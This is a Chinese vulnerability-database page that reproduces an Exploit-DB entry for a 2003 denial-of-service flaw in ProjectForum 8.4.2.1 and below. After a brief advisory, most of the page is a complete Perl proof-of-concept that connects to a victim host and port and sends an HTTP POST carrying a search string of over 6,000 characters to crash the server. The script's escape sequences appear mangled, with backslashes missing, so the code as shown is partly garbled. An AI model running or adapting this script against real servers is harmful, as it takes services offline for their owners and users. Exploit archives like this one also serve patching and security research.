ProjectForum 8.4.2.1 – Find Request Denial of Service

ProjectForum 8.4.2.1 – Find Request Denial of Service

漏洞ID 1054322 漏洞类型
发布时间 2003-12-22 更新时间 2003-12-22
图片[1]-ProjectForum 8.4.2.1 – Find Request Denial of Service-安全小百科CVE编号 N/A
图片[2]-ProjectForum 8.4.2.1 – Find Request Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23460
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9271/info

It has been reported that ProjectForum may be prone to a denial of service vulnerability that may allow an attacker to cause the server to crash by sending an excessively long string via the 'find' request to the server.

ProjectForum versions 8.4.2.1 and prior have been reported to be prone to this issue. 

#!/usr/bin/perl -w

############################################################
#                                                          #
# ProjectForum 8.4.2.1 and below DoS Proof of Concept Code #
#  by Peter Winter-Smith [[email protected]]           #
#                                                          #
############################################################

use IO::Socket;

if(!($ARGV[1]))
{
print "nUsage: pfdos.pl <victim> <port>n" .
     "tdefault port is 3455nn";
exit;
}

$victim = IO::Socket::INET->new(Proto=>'tcp',
                              PeerAddr=>$ARGV[0],
                              PeerPort=>$ARGV[1])
                          or die "Unable to connect to $ARGV[0] " .
                                 "on port $ARGV[1]";

$DoSpacket = '' .
 'POST /1/Search HTTP/1.1' . "x0dx0a" .
 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, ' .
 'application/x-gsarcade-launch, application/vnd.ms-excel, ' .
 'application/vnd.ms-powerpoint, application/msword, ' .
 'application/x-shockwave-flash, */*' . "x0dx0a" .
 'Referer: http://localhost:3455/1/Search' . "x0dx0a" .
 'Accept-Language: en-gb..Content-Type: application/x-www-form-' .
 'urlencoded' . "x0dx0a" .
 'Accept-Encoding: gzip, deflate' . "x0dx0a" .
 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ' .
 'xxxxxxxxxxxxx' . "x20" .
 '1.0.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322)' . "x0dx0a" .
 'Host: localhost:3455' . "x0dx0a" .
 'Content-Length: 6306' . "x0dx0a" .
 'Connection: Keep-Alive' . "x0dx0a" .
 'Cache-Control: no-cache' . "x0dx0a" . "x0dx0a" .
 'q=' . 'a'x6292 . '&action=Find' . "x0dx0a";


print $victim $DoSpacket;

print " + Making Request ...n + Server should be dead!!n";

sleep(4);
close($victim);

print "Done.n";
exit;

相关推荐: NetBSD 1.x – ‘TalkD’ User Validation

NetBSD 1.x – ‘TalkD’ User Validation 漏洞ID 1053571 漏洞类型 发布时间 2002-04-03 更新时间 2002-04-03 CVE编号 N/A CNNVD-ID N/A 漏洞平台 NetBSD_x86 CVSS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享